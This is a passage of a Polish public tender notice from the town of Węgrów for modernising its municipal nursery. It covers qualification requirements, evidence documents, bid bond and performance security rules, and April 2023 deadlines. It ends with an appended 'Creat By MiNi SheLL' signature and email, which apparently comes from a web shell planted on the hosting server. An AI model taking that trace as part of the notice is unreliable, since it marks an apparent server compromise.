instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub<br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów<br/>prawa - osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa<br/>c) Kierownik robót elektrycznych z co najmniej 5-letnim stażem - minimalne wymagania:<br/>- uprawnienia budowlane umożliwiające kierowanie robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa - osoba ta musi należeć do<br/>właściwej Izby Inżynierów Budownictwa<br/>Zgodnie z ustawą z dnia 7 lipca 1994 r. – Prawo budowlane, samodzielne funkcje techniczne w budownictwie danej branży<br/>bez ograniczeń, m.in. kierowanie budową lub innymi robotami budowlanymi, mogą wykonywać wyłącznie osoby posiadające<br/>wymagane uprawnienia budowlane, będące członkami właściwych izb samorządu zawodowego (tekst jednolity: Dz. U. z<br/>2021 r., poz. 2351 ze zm.).<br/>UWAGA. Zamawiający dopuszcza możliwość łączenia funkcji poszczególnych branż przez jedną osobę, jeśli osoba ta<br/>posiadać będzie wymagane doświadczenie i uprawnienia.<br/>UWAGA:<br/>1. Wykazując spełnianie warunku udziału w postępowaniu w wykazie osób należy podać informację o doświadczeniu w<br/>projektowaniu i kierowaniu robotami budowlanymi, sanitarnymi i elektrycznymi.<br/>2. Wykonawca w celu wykazania spełniania w/w warunku może wskazać osobę będącą obywatelem państwa<br/>członkowskiego, która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznaczne<br/>wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej – zgodnie z<br/>właściwymi przepisami, w szczególności z ustawą z 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r. poz. 220, z 2021 r. poz. 78.) oraz ustawą z dnia<br/>15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz. U. z 2019 r. poz. 1117 ),<br/>którą przedstawi Zamawiającemu przed zawarciem umowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na wezwanie<br/>Zamawiającego Wykonawca zobowiązany jest do złożenia następujących oświadczeń lub dokumentów, potwierdzających brak<br/>podstaw wykluczenia:<br/>1) odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji – w celu potwierdzenia braku podstaw wykluczenia na podstawie art.<br/>109 ust. 1 pkt. 4 ustawy Pzp;<br/>2) informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1 i 2 ustawy Pzp oraz w zakresie<br/>określonym w art. 108 ust. 1 pkt 4 ustawy Pzp dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>karnego, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału<br/>w postępowaniu;<br/>3) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), z innym<br/>Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej, zgodnie ze wzorem stanowiącym załącznik nr 7 do SWZ;<br/>4) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust.1 ustawy w zakresie<br/>podstaw do wykluczenia z postępowania o których mowa:<br/>- w art. 108 ust.1 pkt.3 ustawy<br/>- w art. 108 ust.1 pkt. 4 w zakresie orzeczenia zakazu ubiegania się o zamówienia publiczne tytułem środka zapobiegawczego,<br/>- w art. 108 ust. 1 pkt. 5 ustawy dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenia<br/>konkurencji,<br/>- w art. 108 ust. 1 pkt.6,<br/>- w art. 7 ust.1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023 r poz. 129 i 185)<br/>zgodnie ze wzorem stanowiącym załącznik nr 8 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Wykonawca składa:<br/>1) wykaz robót budowlanych i usług wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>inne odpowiednie dokumenty;<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych<br/>zaprojektowanie i kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich<br/>czynności oraz informacją o podstawie dysponowania tymi osobami<br/>3) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem<br/>Jeżeli złożone przez Wykonawcę oświadczenie, o którym mowa w pkt 9.2 SWZ lub podmiotowe środki dowodowe budzą wątpliwości<br/>Zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub dokumentów istotnych w tym<br/>zakresie dla oceny spełniania przez Wykonawcę warunków udziału w postępowaniu lub braku podstaw wykluczenia, o<br/>przedstawienie takich informacji lub dokumentów.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Składający ofertę winien wnieść wadium przed upływem terminu składania ofert w wysokości: 10 000,00 zł (dziesięć<br/>tysięcy złotych)<br/>2.Wadium może być wnoszone w następujących formach:<br/>- pieniądzu,<br/>- gwarancjach bankowych,<br/>- gwarancjach ubezpieczeniowych;<br/>- poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2022 r. poz.2080 i 2185)<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego Miasto Węgrów, ul. Rynek Mariacki<br/>16, 07-100 Węgrów, numer konta: 61 1020 4476 0000 8702 0365 0132 z dopiskiem: wadium na „Modernizacja Żłobka<br/>Miejskiego w Węgrowie”, FEiZP.271.1.1.2023 (II podejście)<br/>Za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego.<br/>4.Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, winno spełniać co najmniej poniższe wymagania:<br/>1) jako Beneficjenta należy wskazać Zamawiającego, którym jest Miasto Węgrów, ul. Rynek Mariacki 16,<br/>07-100 Węgrów<br/>2) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w<br/>art. 98 ust.6 ustawy Pzp;<br/>3) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>4) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie Zamawiającego;<br/>5) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż<br/>pierwszym dniem związania ofertą jest dzień składania ofert);<br/>6) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>7) koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę<br/>wadium przez Wykonawcę, określone w art. 98 ust. 6 ustawy Pzp.<br/>8) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy Pzp), Zamawiający<br/>wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji)<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza<br/>ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>9) oryginał gwarancji lub poręczenia musi zostać złożone wraz z ofertą nastronie interetowej prowadzonego postępowania<br/>Zamawiającego tj. https://ezamowienia.gov.pl/pl/ w postaci elektronicznej.<br/>5.W przypadku wniesienia wadium w formie:<br/>1) pieniężnej - zaleca się, by dowód dokonania przelewu został dołączony do oferty;<br/>2) poręczeń lub gwarancji - wymaga się, by oryginał dokumentu został złożony wraz z ofertą.<br/>6.Oferta Wykonawcy, który nie wniesie wadium w wymaganym terminie oraz wymaganej wysokości i formie lub nie utrzyma<br/>wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa<br/>w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona.<br/>7.Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1 i 2 ustawy Pzp. Wykonawca będzie miał<br/>możliwość w przypadkach określonych w art. 98 ust. 2 ustawy Pzp wystąpienia o zwrot wadium, przy czym złożenie wniosku o zwrot wadium spowoduje rozwiązanie stosunku prawnego Zamawiającego z Wykonawcą i utratę przez Wykonawcę prawa<br/>do korzystania ze środków ochrony prawnej, uregulowanych w Dziale IX ustawy Pzp.<br/>8.Zamawiający zwróci wadium wniesione w formie poręczenia lub gwarancji poprzez złożenie gwarantowi lub<br/>poręczycielowi oświadczenia o zwolnieniu wadium. Zaleca się, aby poręczenie lub gwarancja wskazywały adres mailowy na<br/>jaki Zamawiający winien składać oświadczenie o zwolnieniu wadium, o którym mowa w art. 98 ust. 5 ustawy Pzp.<br/>9.Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo należy dołączyć do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, oraz w przypadkach, o których mowa w art.109 ust.4, natomiast<br/>spełnianie warunków udziału w postępowaniu Wykonawcy wykazują łącznie.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt 9.2 SWZ<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>4. W przypadku, gdy spełnienie warunku dotyczącego zdolności technicznej lub zawodowej (opisanego w pkt 7.2.4) SWZ<br/>wykazuje co najmniej jeden z wykonawców lub wykonawcy wykazują poprzez poleganie na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane, Wykonawcy<br/>oświadczają, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie<br/>Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe, o których mowa w pkt 9 SWZ, przy czym:<br/>1) podmiotowe środki dowodowe o których mowa w pkt 9.8 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy<br/>wykazuje/ą spełnianie warunku, w zakresie i na zasadach opisanych w pkt 7.2 SWZ;<br/>2) dokumenty i oświadczenia o których mowa w pkt 9.7 SWZ składa każdy z nich. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy w sprawie zamówienia publicznego zostały określone w projektowanych postanowieniach umowy<br/>stanowiących załącznik nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-21 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-21 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Zabezpieczenie należytego wykonania umowy w wysokości 5 % ceny całkowitej podanej w ofercie należy złożyć przed<br/>podpisaniem umowy w jednej z następujących postaci:<br/>- pieniądzu;<br/>- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej; z tym, że zobowiązanie kasy<br/>jest zawsze zobowiązaniem pieniężnym;<br/>- gwarancjach bankowych;<br/>- gwarancjach ubezpieczeniowych<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>2. Zabezpieczenie należytego wykonania umowy wnoszone przelewem należy wpłacać na konto Zamawiającego nr 61 1020<br/>4476 0000 8702 0365 0132 z podaniem tytułu wpłaty. <br/>3. W przypadku wnoszenia zabezpieczenia należytego wykonania umowy przelewem, za termin jego wniesienia przyjmuje<br/>się datę uznania rachunku Zamawiającego<br/>4. Zabezpieczenie należytego wykonania umowy wniesione w formie poręczenia bankowego, poręczenia spółdzielczej kasy<br/>oszczędnościowo - kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielanego przez<br/>podmiot, o którym mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości będzie akceptowana pod warunkiem, że jest zgodne z Prawem Zamówień Publicznych oraz zawieraną<br/>umową, a w szczególności:<br/>4.1 100% wartości zabezpieczenia należytego wykonania umowy będzie zawierało określony datą termin odpowiedzialności<br/>wykonawcy za niewykonanie lub nienależyte wykonanie zamówienia, nie krótszy niż termin obejmujący okres przewidziany<br/>umową na odbiór końcowy przedmiotu umowy i okres 30 dni po odbiorze.<br/>4.2. 30% wartości zabezpieczenia należytego wykonania umowy pozostawione na zabezpieczenie roszczeń z tytułu rękojmi<br/>za wady będzie zawierało określony datą termin odpowiedzialności Wykonawcy z tytułu rękojmi za wady, nie krótszy niż<br/>okres rękojmi i obejmujący dodatkowy okres 15 dni.<br/>Do oferty należy dołączyć:<br/>1 Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w postaci elektronicznej<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym – wzór oświadczenia<br/>stanowi Załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o<br/>nie poleganiu wykluczeniu składa każdy z Wykonawców;<br/>2. Dowód wniesienia wadium<br/>3. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>4. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>5. Zobowiązanie podmiotu udostępniającego zasoby<br/>6. Oferta oraz oświadczenie o niepodleganiu wykluczeniu muszą być złożone w oryginale.<br/>7. Zamawiający zaleca ponumerowanie stron oferty.<br/>8. Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (t.j. w formie<br/>elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także<br/>złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie<br/>elektronicznego poświadczenia sporządzonego stosownie do art. 97§2 ustawy z dnia 14 lutego 1991r. -Prawo o notariacie,<br/>które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu<br/>pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem<br/>osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.

Creat By MiNi SheLL
Email: jattceo@gmail.com